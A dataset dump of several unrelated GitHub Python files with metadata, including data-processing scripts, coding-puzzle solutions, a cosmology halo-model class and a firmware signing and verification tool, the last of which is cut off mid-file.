+{"seq_id":"72574172707","text":"def BuyMe(prefix=\"Please buy me\", what=\"something nice.\"):\n print(prefix, what)\n\n\nBuyMe(\"Please buy me\", \"a new car.\")\nBuyMe(what=\"a new car.\", prefix=\"Please buy me\")\nBuyMe(\"Please\")\nBuyMe(prefix=\"Please buy me\")\nBuyMe(what=\"something sweet.\")\n\ncarBrand = \"Seat\"\ncarModel = \"Ibiza\"\ncarIsAirbagOk = True\ncarIsPaintingOk = True\ncarIsMechanicOk = True\n\n\ndef printIsCarDamged(carIsAirbagOk, carIsPaintingOk, carIsMechanicOk):\n return not (carIsAirbagOk and carIsPaintingOk and carIsMechanicOk)\n\n\nprint(printIsCarDamged(carIsAirbagOk, carIsPaintingOk, carIsMechanicOk))\n","repo_name":"matisarnowski/Python-All","sub_path":"internet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15015536226","text":"import numpy as np\n# A = np.eye(137)\n# with open('TE/solar.txt','r') as f:\n# for line in f.readlines():\n# if not line:\n# continue\n# i,b = line.split('-')\n# print(i,b)\n# j,v = b.split(':')\n# A[int(i)][int(j)] = float(v)\n# print(A)\n# f1 = open('TE/so.txt','w')\n# for i in range(137):\n# for j in range(137):\n# f1.write(str(A[i,j])+' ')\n# f1.write('\\n')\n# f1.close()\nfile = 'data/exchange_rate.txt'\nA = np.loadtxt(file, delimiter=',').T\nf1 = open('ex_T.txt','w')\nfor i in range(A.shape[0]):\n for j in range(A.shape[1]):\n f1.write(str(A[i,j])+',')\n f1.write('\\n')\nf1.close()\nprint(A.shape)\n","repo_name":"RRRussell/CauGNN","sub_path":"TENet-master/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"23514666391","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom process_db_data.data_cleaning_utils import create_id_col\nfrom file_paths import processed_data\nimport process_db_data.process_utilization as utl\n\n\ndef process_er_only(update=True):\n \"\"\"\n Cleans/Processes dataset\n \n Indicated columns are dropped\n Column names are cleaned\n Training member is dropped\n Column added to indicate if admission is\n within 6 months of enrollment\n Day of week column is added\n Column to count days since last visit is created\n\n Returns:\n DataFrame: cleaned dataframe\n \n Outputs:\n csv: processed data files\n \"\"\"\n er_only = utl.load_utlization(\"er_only.csv\")\n\n er_only = utl.admission_within_6_mo(er_only, update=update)\n\n er_only = utl.admission_dow(er_only)\n\n er_only = utl.discharge_admit_diff(\n er_only, table_name=\"er_only\", update=False, admit_diff=True\n )\n\n er_only[\"visit_id\"] = create_id_col(\n er_only, [\"member_id\", \"admission_date\", \"facility\"], \"visit_id\"\n )\n\n cols_to_drop = [\n \"enrollment_date\",\n \"participant_name\",\n \"text_box5\",\n \"text_box2\",\n \"p_c_p\",\n \"center\",\n ]\n\n er_only.drop(cols_to_drop, axis=1, inplace=True)\n er_only.to_csv(f\"{processed_data}\\\\er_only.csv\", index=False)\n\n # utl_grid = load_clean_utl_grid(utl_type=\"er\")\n\n # update_utl_grid(utl_grid, er_only_merged, utl_type=\"er\")\n\n # merge_utl(utl_grid, er_only_merged, utl_filename=\"er_only\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--update\",\n default=True,\n help=\"Are we updating the database or creating it? True for update\",\n )\n\n arguments = parser.parse_args()\n\n process_er_only(**vars(arguments))\n","repo_name":"whatscottcodes/database_mgmt","sub_path":"code/process_db_data/process_er_only.py","file_name":"process_er_only.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30112978300","text":"n = int(input())\ncards=[]\narr = []\nfor _ in range(n):\n x = int(input())\n arr.append(x)\n if x not in cards:\n cards.append(x)\nif len(cards)!=2:\n print(\"NO\")\nelse:\n if arr.count(cards[0]) == arr.count(cards[1]):\n print(\"YES\")\n print(cards[0], cards[1])\n else:\n print(\"NO\")\n","repo_name":"rehan-bhatia/codeforces_div2_A","sub_path":"Fair Game.py","file_name":"Fair Game.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12496652507","text":"# Ref: 1973 Electron modecule collision ionization in hydrogen and deuterium\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nfilename_old = \"original/Ionization_Cu_to_Cu+1.dat\"\nfilename_new = \"data/Ionization_Cu_to_Cu+1.dat\"\ndata = np.loadtxt(filename_old)\nnp.savetxt(filename_new, data, fmt='%1.5e')\nplt.plot(data[:,0], data[:,1], label = \"Ionization_Cu_to_Cu+1\")\n\nplt.legend()\nplt.xlim((0.0, 500.0))\nplt.savefig(\"fig/Ionization_Cu.png\")\n","repo_name":"wphu/SmileiSE","sub_path":"tools/crossSection/Cu/Ionization_Cu.py","file_name":"Ionization_Cu.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"72125785186","text":"from Feedback import Feedback\nfrom InfinityStone import InfinityStone\nfrom Player import Player\n\n\nclass State:\n # This class is data given for users. for now penality score, feedback, movegen, player's troops info.\n def __init__(self, movegen: dict, feedback, penalty_score, round_no, player: Player,\n infinityStone: InfinityStone) -> None:\n self.__feedback = feedback\n self.__penalty_score = penalty_score\n self.__round_no = round_no\n self.__movegen = movegen\n self.__player = player\n self.__infinityStone = infinityStone\n\n def get_movegen(self):\n return self.__movegen\n\n def get_feedback(self):\n return self.__feedback\n\n def get_penality_score(self):\n return self.__penalty_score\n\n def json(self):\n movegen_as_json = {}\n for troop_name, troop in self.__movegen.items():\n neighbours = []\n if troop_name == \"StarLord\":\n starlord_list = []\n for side in troop[1]:\n side_list = []\n for curr_cell in side:\n side_list.append(curr_cell.get_coordinates())\n starlord_list.append(side_list)\n\n starLord_vision = Feedback(\"star_lord_special_power\", {\"special_vision\": starlord_list})\n self.__feedback.append(starLord_vision)\n troop = troop[0]\n\n for cell_list in troop:\n side = []\n for cell in cell_list:\n guardian_present_list = []\n for i in cell.get_guardians_present():\n if i.get_belongs_to_player().get_player_id() == self.__player.get_player_id():\n data = {\n \"belongs_to\": 'you',\n \"guardian_name\": i.get_type()\n }\n guardian_present_list.append(data)\n else:\n data = {\n \"belongs_to\": 'opponent',\n \"guardian_name\": i.get_type()\n }\n guardian_present_list.append(data)\n side.append({\"coordinates\": str(cell.get_coordinates()),\n \"cell_type\": cell.get_cell_type(),\n \"is_powerStone_present\": str(cell.get_coordinates(\n ) == self.__infinityStone.get_coordinates()),\n 'guardians_present': guardian_present_list})\n\n neighbours.append(side)\n #\n guardian = self.__player.get_guardian_by_type(troop_name)\n\n guardian_present_list = []\n for i in guardian.get_coordinates().get_guardians_present():\n if i.get_belongs_to_player().get_player_id() == self.__player.get_player_id():\n data = {\n \"belongs_to\": 'you',\n \"guardian_name\": i.get_type()\n }\n guardian_present_list.append(data)\n else:\n data = {\n \"belongs_to\": 'opponent',\n \"guardian_name\": i.get_type()\n }\n guardian_present_list.append(data)\n\n current_cell = {\"coordinates\": str(guardian.get_coordinates().get_coordinates()),\n \"cell_type\": guardian.get_coordinates().get_cell_type(),\n \"is_powerStone_present\": str(guardian.get_coordinates(\n ) == self.__infinityStone.get_coordinates()),\n 'guardians_present': guardian_present_list}\n\n movegen_as_json[troop_name] = {\"health\": guardian.get_health(), \"cooldown\": guardian.get_cooldown(),\n \"current_cell\": current_cell, \"neighbour_cells\": neighbours}\n\n feedback_as_json = []\n for feed in self.__feedback:\n feedback_as_json.append(feed.json())\n\n return {\n \"movegen\": movegen_as_json,\n \"feedback\": feedback_as_json,\n \"penalty_score\": self.__penalty_score,\n \"round_no\": self.__round_no\n }\n","repo_name":"Arvind-kumar-M-08/Groot","sub_path":"State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"38211901023","text":"from headers_constants import *\n\n\nclass ProfHODMore15:\n # def __init__(self, U, MassFunc):\n def __init__(self, data_var_iv, cosmo_var_iv, gal_exp):\n self.dv = data_var_iv\n self.uni = cosmo_var_iv\n self.mh = self.uni.mass\n self.z = self.uni.z # self.dv.z\n self.ell = self.dv.ell\n self.hmfmz = self.uni.hmf # self.dv.hmf\n # self.biasmz = self.uni.bias_m_z\n self.biasmz = self.uni.interp_bias(self.z)\n self.unfw = self.uni.interp_nfw(self.ell, self.z)\n # self.dn_dz = self.dv.dn_dz()\n # self.Pk = self.uni.pkinterpz(self.z)\n self.gal_exp = gal_exp\n \"\"\"HOD for CMASS\n from More Miyatake +15\n \"\"\"\n # HOD params, More+15, average of the 3 columns in Table 1\n self.alphaInc = 0.51\n self.log10mInc = 13.84\n # self.log10mMin = 12.7 # 12.00 # 13.42\n \"\"\"\n log10mMin determines somehow the minimum mass detectable by the survey.\n Of course, DESI survyes are going to detect galaxies much better than\n CMASS. So we need to go to lower lowest detectable mass than CMASS for\n these surveys. These values for DESI LRG and DESI ELG are determined\n such that total number of galaxies approximately detected (N_tot function below) by\n LRG in 0.4 < z < 1 are 10 times more than CMASS, ELG in 0.6 < z < 1.6\n are 30 times more than CMASS. For ExtDESI_ELG, we keep the number of\n galaxies detected as same as DESI ELG i.e. 30 times more than CMASS,\n but spread on abroader redshift range i.e. 0.6 < z < 3.2.\n \"\"\"\n if self.gal_exp == 'CMASS':\n self.log10mMin = 13.42\n elif self.gal_exp == 'DESI_LRG':\n self.log10mMin = 12.5\n elif self.gal_exp == 'DESI_ELG':\n self.log10mMin = 12.1\n elif self.gal_exp == 'ExtDESI_ELG':\n self.log10mMin = 12.7\n self.sLog10m = np.sqrt(0.49)\n self.kappa = 1.10\n self.mMinHod = 10.**(13.42)\n self.m1 = 10.**(14.43)\n self.alpha_ = 1.09\n self.pOff = 0.357\n self.rOff = 2.3\n\n self.mMin = 0.\n self.mMax = np.inf\n\n # self.galexp = gal_exp\n # super(ProfHODMore15, self).__init__(U, MassFunc)\n\n def __str__(self):\n return \"hodmore15\"\n\n# ############################################################################\n def dn_dz(self):\n if self.gal_exp == 'CMASS':\n # \"\"\"\n # this is CMASS data\n data = np.loadtxt(\"data_files/dn_dz_cmass.txt\")\n Z = data[:, 0]\n Dndz = data[:, 1]\n elif self.gal_exp == 'DESI_ELG' or self.gal_exp == 'DESI_LRG':\n # \"\"\"\n # DESI_ELG and DESI_LRG data. Please note however, we are using the same HOD as that\n # of CMASS derived in More+15. Not sure how good this approx is\n # DESi data in a redshift bin is number of galaxies per square\n # degrees.\n # 1. This can be converted into ngal i.e. angular number density\n # which is number of galaxies per unit steradian. To go from per\n # square degree to per steradian => divide by (pi/180)**2\n # 2. dN/dz which is number of galaxies per redshift per steradian. So\n # dN/dz = ngal/\\Delta z where \\Delta z is redshift bin width i.e. 0.1\n # in this case. 
and ngal is calculated as in number 1 step.\n # data = np.loadtxt(\"data_files/dndz_DESI_ELG.txt\")\n # data = np.loadtxt(\"data_files/dndz_DESI_LRG.txt\")\n data = np.loadtxt('data_files/dndz_'+self.gal_exp+'.txt')\n Z1, Z2 = data[:, 0], data[:, 1]\n Z = (Z1+Z2)/2.\n deltaz = Z2 - Z1\n # converting from per squre degrees to per steradian\n ngal = data[:, 2]/(np.pi/180.)**2\n Dndz = ngal/deltaz\n else:\n data = np.loadtxt('data_files/dndz_DESI_ELG.txt')\n Z1, Z2 = data[:, 0], data[:, 1]\n Z = Z1+Z2\n deltaz = 2*(Z2 - Z1)\n # converting from per squre degrees to per steradian\n ngal = data[:, 2]/(np.pi/180.)**2\n # ngal *= 10\n Dndz = ngal/deltaz\n # \"\"\"\n f = UnivariateSpline(Z, Dndz, k=1, s=0, ext=1)\n dndz = lambda z: f(z) * (z >= np.min(Z)) * (z <= np.max(Z))\n return dndz\n\n def fInc(self, m):\n \"\"\"More+15 assume that for a given halo mass,\n a fixed fraction of CMASS galaxies are seen\n how physical is this?\n \"\"\"\n # m = self.mh\n result = np.min([1., 1.+self.alphaInc*(np.log10(m) - self.log10mInc)])\n result = np.max([0., result])\n return result\n\n def Ncen(self, m):\n \"\"\"number of central galaxies per halo, between 0 and 1\n \"\"\"\n # m = self.mh\n result = np.log10(m) - self.log10mMin\n result /= self.sLog10m\n result = 0.5*(1.+special.erf(result))\n result *= self.fInc(m)\n return result\n\n def Nsat(self, m):\n \"\"\"number of satellite galaxies per halo\n \"\"\"\n # m = self.mh\n result = (m - self.kappa * self.mMinHod)\n if result > 0.:\n result /= self.m1\n result **= self.alpha_\n result *= self.Ncen(m)\n else:\n result = 0.\n return result\n\n def nbargal(self):\n m = self.mh\n hmf = self.hmfmz\n N_g = np.zeros(len(m))\n for mm in range(len(m)):\n N_g[mm] = self.Ncen(m[mm])+self.Nsat(m[mm])\n dm = np.log10(m[1] / m[0])\n integral = hmf*N_g[:, None]\n return intg.simps(integral, dx=dm, axis=0, even='avg')\n\n def N_tot(self):\n z = self.z\n # nbarg = self.nbargal()\n fnbar = interp1d(z, self.nbargal(), kind='linear',\n bounds_error=False, fill_value=0.)\n if self.gal_exp == 'CMASS':\n zmin, zmax = 0.4, 0.7\n elif self.gal_exp == 'DESI_LRG':\n zmin, zmax = 0.4, 1.0\n elif self.gal_exp == 'DESI_ELG':\n zmin, zmax = 0.6, 1.6\n elif self.gal_exp == 'ExtDESI_ELG':\n zmin, zmax = 0.6, 3.2\n zint = np.linspace(zmin, zmax, 30)\n chi = self.uni.chi(zint)\n dchidz = self.uni.dchi_dz(zint)\n integral = fnbar(zint)*4*np.pi*chi**2*dchidz\n res = intg.simps(integral, x=zint, axis=0, even='avg')\n return res\n\n def Nbargal(self):\n Dndz = self.dn_dz()\n res = lambda z: intg.simps(Dndz(z), x=z, even='avg')\n return res\n\n def window_gal(self):\n dndz = self.dn_dz()\n nbarg = self.Nbargal()\n # this should be divided by dchi_dz() but as it is defined later, we\n # do the division later while calculating the total window func\n res = lambda z: dndz(z)/nbarg(z)\n return res\n\n def p1h_gal(self, ucen, unfw):\n m = self.mh\n z = self.z\n hmf = self.hmfmz\n # ucen = self.uni.self.nfw_u # unfw\n # unfw = self.uni.self.nfw_u # unfw\n num = np.zeros((len(unfw[0, :, 0]), len(m), len(z)))\n for mi in range(len(m)):\n num[:, mi, :] = 2*self.Ncen(m[mi])*ucen[mi, :, :]*self.Nsat(m[mi])*unfw[mi, :, :]\n num[:, mi, :] += (self.Nsat(m[mi])*unfw[mi, :, :])**2\n denom = self.nbargal()**2\n integral = hmf*num/denom\n # print (integral.shape)\n # print (np.shape(m))\n # dm = np.log10(m)\n dlog10m = np.log10(m[1] / m[0])\n res = intg.simps(integral, dx=dlog10m, axis=1, even='avg')\n return res\n\n def p2h_gal(self, ucen, unfw, power):\n m = self.mh\n z = self.z\n hmf = self.hmfmz\n # ucen = 
self.uni.self.nfw_u # unfw\n        # unfw = self.uni.self.nfw_u # unfw\n        biasmz = self.biasmz\n        # power = self.uni.pkinterpz(self.z)\n        \n        num = np.zeros((len(unfw[0, :, 0]), len(m), len(z)))\n        for mi in range(len(m)):\n            num[:, mi, :] = self.Ncen(m[mi])*ucen[mi, :, :]+self.Nsat(m[mi])*unfw[mi, :, :]\n        num *= hmf*biasmz\n        denom = self.nbargal()\n        integral = num/denom\n        # dm = np.log10(m)\n        dlog10m = np.log10(m[1] / m[0])\n        res = (intg.simps(integral, dx=dlog10m, axis=1, even='avg'))**2\n        res *= power\n        return res\n\n    def cl1h_gal(self):\n        z = self.z\n        ucen = self.unfw\n        unfw = self.unfw\n        dchidz = self.uni.dchi_dz(self.z)\n        chi = self.uni.chi(self.z)\n\n        window = self.window_gal()\n        wind_gal = window(z)/dchidz\n        geo = dchidz*wind_gal**2/chi**2\n        oneh = self.p1h_gal(ucen, unfw)\n        # print (\"one halo gal Pk %s\" % (oneh[-1, -10:]))\n        integral = geo*oneh\n        res = intg.simps(integral, x=z, axis=-1, even='avg')\n        # print (\"one halo gal cl %s\" % (res[-10:]))\n        return res\n\n    def cl2h_gal(self):\n        z = self.z\n        ucen = self.unfw\n        unfw = self.unfw\n        power = self.uni.Pk_array(self.ell, self.z)\n        dchidz = self.uni.dchi_dz(self.z)\n        chi = self.uni.chi(self.z)\n\n        window = self.window_gal()\n        wind_gal = window(z)/dchidz\n        geo = dchidz*wind_gal**2/chi**2\n        twoh = self.p2h_gal(ucen, unfw, power)\n        integral = geo*twoh\n        res = intg.simps(integral, x=z, axis=-1, even='avg')\n        return res\n\n    def clshot_gal(self):\n        if self.gal_exp == 'CMASS':\n            # \"\"\"\n            # this is CMASS data\n            data = np.loadtxt(\"data_files/dn_dz_cmass.txt\")\n            Z = data[:, 0]\n            Dndz = data[:, 1]\n            ngaltot = intg.simps(Dndz, x=Z, even='avg')\n        elif self.gal_exp == 'DESI_ELG' or self.gal_exp == 'DESI_LRG':\n            data = np.loadtxt('data_files/dndz_'+self.gal_exp+'.txt')\n            # converting from per square degrees to per steradian\n            ngal = data[:, 2]/(np.pi/180.)**2\n            ngaltot = np.sum(ngal)\n        else:\n            data = np.loadtxt('data_files/dndz_DESI_ELG.txt')\n            # converting from per square degrees to per steradian\n            ngal = data[:, 2]/(np.pi/180.)**2\n            ngaltot = np.sum(ngal)\n            # ngaltot *= 10\n        \"\"\"\n        # data = np.loadtxt(\"data_files/dndz_DESI_ELG.txt\")\n        data = np.loadtxt(\"data_files/dndz_DESI_LRG.txt\")\n        # add all the ngal contributions coming from different redshifts\n        # and then take its inverse to get the shot noise in angular power\n        # spectrum i.e. C_l^{SN} = 1./ngal where ngal is the angular number\n        # density i.e. 
number of galaxies per steradian.\n        # shot = self.Nbargal()\n        # \"\"\"\n        shot = 1./ngaltot\n        return shot\n\n    def cl_galtot(self):\n        oneh = self.cl1h_gal()\n        twoh = self.cl2h_gal()\n        shot = np.repeat(self.clshot_gal(), len(self.ell))\n        tot = oneh+twoh+shot\n        return tot\n\n    def cl1h_vel(self):\n        z = self.z\n        ucen = self.unfw\n        unfw = self.unfw\n        dchidz = self.uni.dchi_dz(self.z)\n        chi = self.uni.chi(self.z)\n\n        window = self.window_gal()\n        wind_gal = window(z)/dchidz\n        geo = dchidz*wind_gal**2/chi**2\n        oneh = self.p1h_gal(ucen, unfw)\n        oneh *= self.uni.beta2(self.z)\n        # print (\"one halo vel Pk %s\" % (oneh[-1, -10:]))\n        integral = geo*oneh\n        res = intg.simps(integral, x=z, axis=-1, even='avg')\n        # print (\"one halo vel cl %s\" % (res[-10:]))\n        return res\n\n    def cl2h_vel(self):\n        z = self.z\n        ucen = self.unfw\n        unfw = self.unfw\n        power = self.uni.Pk_array(self.ell, self.z)\n        dchidz = self.uni.dchi_dz(self.z)\n        chi = self.uni.chi(self.z)\n\n        window = self.window_gal()\n        wind_gal = window(z)/dchidz\n        geo = dchidz*wind_gal**2/chi**2\n        twoh = self.p2h_gal(ucen, unfw, power)\n        twoh *= self.uni.beta2(self.z)\n        integral = geo*twoh\n        res = intg.simps(integral, x=z, axis=-1, even='avg')\n        return res\n\n    def clshot_vel(self):\n        \"\"\"\n        SHOT NOISE FOR VELOCITY POWER SPECTRUM? DO WE WEIGH BETA2 AT EVERY\n        REDSHIFT BIN WITH NUMBER DENSITY OF THE GALAXIES?\n        \"\"\"\n        \"\"\"\n        For now, I am going to weigh the shot noise contribution coming from\n        every redshift by beta2 times the galaxy number density, and then get\n        the shot noise in angular space.\n        \"\"\"\n        \n        if self.gal_exp == 'CMASS':\n            # \"\"\"\n            # this is CMASS data\n            data = np.loadtxt(\"data_files/dn_dz_cmass.txt\")\n            Z = data[:, 0]\n            Dndz = data[:, 1]\n            beta2 = self.uni.beta2(Z)\n            res = Dndz*beta2\n            ngaltot = intg.simps(res, x=Z, even='avg')\n        else:\n            data = np.loadtxt('data_files/dndz_'+self.gal_exp+'.txt')\n            # converting from per square degrees to per steradian\n            ngal = data[:, 2]/(np.pi/180.)**2\n            Z = (data[:, 0]+data[:, 1])/2.\n            beta2 = self.uni.beta2(Z)\n            res = ngal*beta2\n            ngaltot = np.sum(res)\n        \"\"\"\n        # data = np.loadtxt(\"data_files/dndz_DESI_ELG.txt\")\n        # add all the ngal contributions coming from different redshifts\n        # and then take its inverse to get the shot noise in angular power\n        # spectrum i.e. C_l^{SN} = 1./ngal where ngal is the angular number\n        # density i.e. number of galaxies per steradian.\n        # shot = self.Nbargal()\n        # \"\"\"\n        shot = 1./ngaltot\n        # print (shot)\n        return shot\n\n    def cl_veltot(self):\n        oneh = self.cl1h_vel()\n        twoh = self.cl2h_vel()\n        # shot = np.repeat(self.clshot_vel(), len(self.ell))\n        tot = oneh+twoh # +shot\n        return tot\n","repo_name":"abhimaniyar/DopplerCIB","sub_path":"Gal_halo.py","file_name":"Gal_halo.py","file_ext":"py","file_size_in_byte":13751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35323868764","text":"class Solution:\n def findAllRecipes(self, recipes: List[str], ingredients: List[List[str]], supplies: List[str]) -> List[str]:\n N=len(recipes)\n supplies=set(supplies)\n indegree=defaultdict(int)\n orderdrecipe=[]\n adjlist=defaultdict(list)\n queue=deque()\n\n\n for i in range(N):\n for j in range(len(ingredients[i])):\n if ingredients[i][j] not in supplies:\n adjlist[ingredients[i][j]].append(recipes[i])\n indegree[recipes[i]]+=1\n \n\n for i in range(N):\n if indegree[recipes[i]]==0:\n queue.append(recipes[i])\n\n # print(queue)\n while queue:\n # for _ in range(len(queue)):\n recipe=queue.popleft()\n orderdrecipe.append(recipe)\n\n for x in adjlist[recipe]:\n indegree[x]-=1\n if indegree[x]==0:\n queue.append(x)\n return orderdrecipe","repo_name":"yoseflakew25/A2SV","sub_path":"find-all-possible-recipes-from-given-supplies.py","file_name":"find-all-possible-recipes-from-given-supplies.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71833986147","text":"import os, sys, struct, pdb, click\nfrom collections import namedtuple\nfrom binascii import b2a_hex\nfrom hashlib import sha256\nfrom ecdsa import SigningKey, VerifyingKey\nfrom ecdsa.curves import SECP256k1\nfrom sigheader import *\n\n# more details about header\nheader = namedtuple('header', FWH_PY_VALUES)\npacked_len = struct.calcsize(FWH_PY_FORMAT)\nassert packed_len == FW_HEADER_SIZE, \\\n \"FWH_PY_FORMAT is wrong: gives %d length, not %d\" % (packed_len, FW_HEADER_SIZE)\n\ndef pad_to(orig, size, fill=b'\\xff'):\n assert len(orig) <= size, \"too big; no room for padding: %d > %d\" % (len(orig), size)\n\n return orig.ljust(size, fill)\n\ndef align_to(n, alignment):\n # align to # of bytes (a power of two)\n return (n + alignment - 1) & ~(alignment-1)\n \ndef timestamp(backdate=0):\n # render 16-byte BCD timecode in something like ISO 8601\n import datetime\n n = datetime.datetime.utcnow()\n if backdate:\n n -= datetime.timedelta(days=backdate)\n\n f = n.strftime('%y%0m%0e%0H%0M%0S0000').encode('ascii')\n assert len(f) == 16\n \n # hex string to binary, but BCD..isn't that just a2b_hex?\n rv = bytes([ ((f[i]& 0xf) << 4) | (f[i+1] & 0xf) for i in range(0, 16, 2)])\n\n assert len(rv) == 8, len(rv)\n\n return rv\n\n# Options we want for all commands\n@click.group()\ndef main():\n pass\n\n@main.command()\n@click.option('-n', type=int, help='Which key # to make', default=1)\n@click.option('--path-pattern', '-p',\n default='keys/%02d.pem', type=str, help='Where to put results')\ndef make_keys(n, path_pattern):\n \"Constuct new keys (only can be used once)\"\n # run once only\n\n from ecdsa.util import randrange_from_seed__trytryagain\n\n def make_key_from_seed(seed, curve=SECP256k1):\n secexp = randrange_from_seed__trytryagain(seed, curve.order)\n return SigningKey.from_secret_exponent(secexp, curve)\n\n assert 1 <= n < 16\n\n if 0:\n # deterministic\n seed = 'ehllo'\n sk1 = make_key_from_seed(\"%02d:%s\" % (n, seed))\n else:\n # actually used:\n sk1 = make_key_from_seed(os.urandom(128))\n\n fn = path_pattern % n\n assert not os.path.exists(fn), \"Already exists: \" + fn\n\n pubkey = sk1.get_verifying_key()\n\n open(fn, 'wb').write(sk1.to_pem())\n fn = fn.replace('.pem', '.pubkey')\n open(fn+'.pem', 'wb').write(pubkey.to_pem())\n #open(fn+'.bin', 'wb').write(pubkey.to_string())\n open(fn+'.c', 'wt').write(', '.join('0x%02x'%i for i in pubkey.to_string()))\n\n\n@main.command('version')\n@click.argument('fname')\ndef show_version(fname):\n # just dump the version number in a form that makes for good filenames\n data = open(fname, 'rb').read()\n\n if data[0:5] == b'DfuSe':\n # Got DFU file, pulling out raw binary.\n (_, _, data),*_ = dfu_parse(open(fname, 'rb'))\n\n hdr = data[FW_HEADER_OFFSET:FW_HEADER_OFFSET+FW_HEADER_SIZE ]\n\n hdr = header(**dict(zip(FWH_PY_VALUES.split(), struct.unpack(FWH_PY_FORMAT, hdr))))\n\n ver = str(hdr.version_string.split(b'\\0', 1)[0], 'ascii')\n ts = str(b2a_hex(hdr.timestamp), 'ascii')\n built = '20' + '-'.join(ts[i:i+2] for i in range(0, 6, 2))\n built += 'T' + ''.join(ts[i:i+2] for i in range(6, 10, 2))\n\n print('{built}-v{ver}'.format(built=built, ver=ver))\n\ndef dfu_parse(fd):\n # do just a little parsing of DFU headers, to find start/length of main binary\n # - not trying to support anything but what ../stm32/Makefile will generate\n # - see external/micropython/tools/pydfu.py for details\n # - works sequentially only\n import struct\n from collections import namedtuple\n\n fd.seek(0)\n\n def consume(xfd, tname, fmt, 
names):\n        # Parses the struct defined by `fmt` from `data`, stores the parsed fields\n        # into a named tuple using `names`. Returns the named tuple.\n        size = struct.calcsize(fmt)\n        here = xfd.read(size)\n        ty = namedtuple(tname, names.split())\n        values = struct.unpack(fmt, here)\n        return ty(*values)\n\n    dfu_prefix = consume(fd, 'DFU', '<5sBIB', 'signature version size targets')\n\n    #print('dfu: ' + repr(dfu_prefix))\n\n    assert dfu_prefix.signature == b'DfuSe', \"Not a DFU file (bad magic)\"\n\n    for idx in range(dfu_prefix.targets):\n\n        prefix = consume(fd, 'Target', '<6sBI255s2I', \n                    'signature altsetting named name size elements')\n\n        #print(\"target%d: %r\" % (idx, prefix))\n\n        for ei in range(prefix.elements):\n            # Decode target prefix\n            #   <   little endian\n            #   I   uint32_t    element address\n            #   I   uint32_t    element size\n            elem = consume(fd, 'Element', '<2I', 'addr size')\n\n            #print(\"target%d: %r\" % (ei, elem))\n\n            yield fd.tell(), elem.size, fd.read(elem.size)\n\n\n@main.command('split')\n@click.argument('dfu', metavar='202....-coldcard.dfu')\n@click.argument('firmware', metavar='FIRMWARE.bin')\n@click.argument('bootrom', metavar='BOOTROM.bin')\ndef split_dfu(dfu, firmware, bootrom):\n    \"Pull out sections from DFU file for verification purposes\"\n\n    with open(dfu, 'rb') as fd:\n        for n, (off, ln, data) in enumerate(dfu_parse(fd)):\n            if n == 0:\n                target = firmware\n                name = 'Firmware'\n            elif n == 1:\n                target = bootrom\n                name = 'Bootrom'\n            else:\n                raise ValueError(n)\n\n            # keep this printout so others can check our copy is faithful\n            print(f'start {off} for {ln} bytes: {name} => {target}')\n\n            open(target, 'wb').write(data)\n\n@main.command('check')\n@click.argument('fname', default='firmware-signed.bin')\ndef readback(fname):\n    \"Verify pubkey and signature used in binary file\"\n    data = open(fname, 'rb').read()\n\n    if data[0:5] == b'DfuSe':\n        click.secho(\"Got DFU file, pulling out raw binary.\", fg='red')\n        (_, _, data),*_ = dfu_parse(open(fname, 'rb'))\n\n    hdr = data[FW_HEADER_OFFSET:FW_HEADER_OFFSET+FW_HEADER_SIZE ]\n\n    vals = {}\n    for fld, v in zip(FWH_PY_VALUES.split(), struct.unpack(FWH_PY_FORMAT, hdr)):\n        vals[fld] = v\n\n        if fld == 'version_string':\n            v = str(v.split(b'\\0', 1)[0], 'ascii')\n        elif fld == 'magic_value':\n            v = hex(v)\n        elif fld in ('signature', 'future'):\n            v = str(b2a_hex(v), 'ascii')\n            v = v[0:16] + ' ... 
' + v[-16:]\n elif fld == 'install_flags':\n nv = '0x%x =>' % v\n if v & FWHIF_HIGH_WATER:\n nv += ' HIGH_WATER'\n v = nv\n elif fld == 'hw_compat':\n nv = '0x%x => ' % v\n d = []\n if v & MK_1_OK: d.append('Mk1')\n if v & MK_2_OK: d.append('Mk2')\n if v & MK_3_OK: d.append('Mk3')\n if v & MK_4_OK: d.append('Mk4')\n if v & ~(MK_1_OK | MK_2_OK | MK_3_OK | MK_4_OK):\n d.append('?other?')\n v = nv + '+'.join(d)\n elif fld == 'timestamp':\n v = str(b2a_hex(v), 'ascii')\n nv = '20' + '-'.join(v[i:i+2] for i in range(0, 6, 2)) + ' '\n nv += ':'.join(v[i:i+2] for i in range(6, 6+6, 2))\n v = nv + ' UTC'\n\n print(\"%16s: %s\" % (fld, v))\n\n # non-useful value, fixed.\n #print('runtime hdr at: 0x%08x' % (0x08008000 + FW_HEADER_OFFSET))\n\n a = sha256(data[0:FW_HEADER_OFFSET+FW_HEADER_SIZE-64])\n a.update(data[FW_HEADER_OFFSET+FW_HEADER_SIZE:])\n chk = sha256(a.digest()).digest()\n\n print(\"sha256^2: %s\" % b2a_hex(chk).decode('ascii'))\n\n # from pubkey\n vk = VerifyingKey.from_pem(open(\"keys/%02d.pubkey.pem\" % vals['pubkey_num']).read())\n\n try:\n ok = vk.verify_digest(vals['signature'], chk)\n except:\n ok = False\n\n print('%16s: %s' % (\"ECDSA Signature\", ('CORRECT' if ok else 'Wrong, wrong, 